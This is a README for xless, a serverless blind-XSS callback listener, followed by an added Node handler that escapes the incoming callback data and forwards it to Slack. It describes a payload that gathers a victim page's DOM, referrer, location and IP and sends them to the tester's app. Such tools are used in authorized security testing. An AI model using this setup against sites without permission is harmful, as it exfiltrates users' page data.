xless: The Serverless Blind XSS App
xless is a serverless blind XSS app for identifying blind XSS vulnerabilities using your own deployed instance of the app. There is no full deployment process: set up a zeit.co account and run `bash deploy.sh`. That's it. You then have a fully running blind XSS listener that notifies you of blind XSS callbacks through Slack.
- zeit.co account: Zeit provides a free plan for serverless deployments. If you use another serverless provider, the required code changes should be minimal.
- Slack Incoming Webhook URL.
```
$ git clone https://github.com/mazen160/xless.git
$ bash deploy.sh
> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
```
- Use the URL for blind XSS testing 🔥
xless will automatically serve the XSS payload, collect information, and exfiltrate it to your serverless app, which then sends it straight to you in Slack. The collected information includes:
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- IP Address
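The receiving side of that flow, as an added example that is not xless's own code: a Node handler in the style of a Zeit Now serverless function that accepts the callback, bounds and escapes the page-controlled fields so a hostile DOM snapshot cannot forge links or mentions in the notification, and forwards the result to the Slack incoming webhook. The callback field names, `MAX_DOM`, the `SLACK_WEBHOOK_URL` environment variable and the use of the global `fetch` (Node 18+) are assumptions.

```javascript
// Added example, not xless's own code. Assumed callback field names:
const FIELDS = ['referrer', 'dom', 'time', 'location'];
// Slack messages have a size limit and a DOM snapshot can be huge; cap it.
const MAX_DOM = 2000;

// Slack mrkdwn treats &, < and > specially; escape them so content taken
// from the victim page cannot inject links, mentions or formatting.
function escapeSlack(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Validate the parsed callback body and build the Slack webhook payload.
function buildSlackMessage(report, clientIp) {
  if (!report || typeof report !== 'object') throw new TypeError('invalid report');
  const lines = ['*Blind XSS callback received*'];
  for (const f of FIELDS) {
    let v = report[f];
    if (typeof v !== 'string') v = '(missing)';          // tolerate partial reports
    if (f === 'dom' && v.length > MAX_DOM) v = v.slice(0, MAX_DOM) + ' [truncated]';
    lines.push(`*${f}:* ${escapeSlack(v)}`);
  }
  // IP comes from the request, not from the page, so it is appended server-side.
  lines.push(`*ip:* ${escapeSlack(String(clientIp || 'unknown'))}`);
  return { text: lines.join('\n') };
}

// POST the payload to the Slack incoming webhook; returns the HTTP status.
async function postToSlack(webhookUrl, message) {
  const resp = await fetch(webhookUrl, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(message),
  });
  return resp.status;
}

// Serverless entry point (req, res). Assumes the platform has already parsed
// the JSON body into req.body and sets x-forwarded-for for the client IP.
async function handler(req, res) {
  const clientIp = req.headers['x-forwarded-for'] || req.socket.remoteAddress;
  try {
    const msg = buildSlackMessage(req.body, clientIp);
    await postToSlack(process.env.SLACK_WEBHOOK_URL, msg);
    res.statusCode = 200; res.end('ok');
  } catch (e) {
    res.statusCode = 400; res.end('bad request'); // malformed callback, nothing sent
  }
}
```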
Copyright (C) 2019 Mazin Ahmed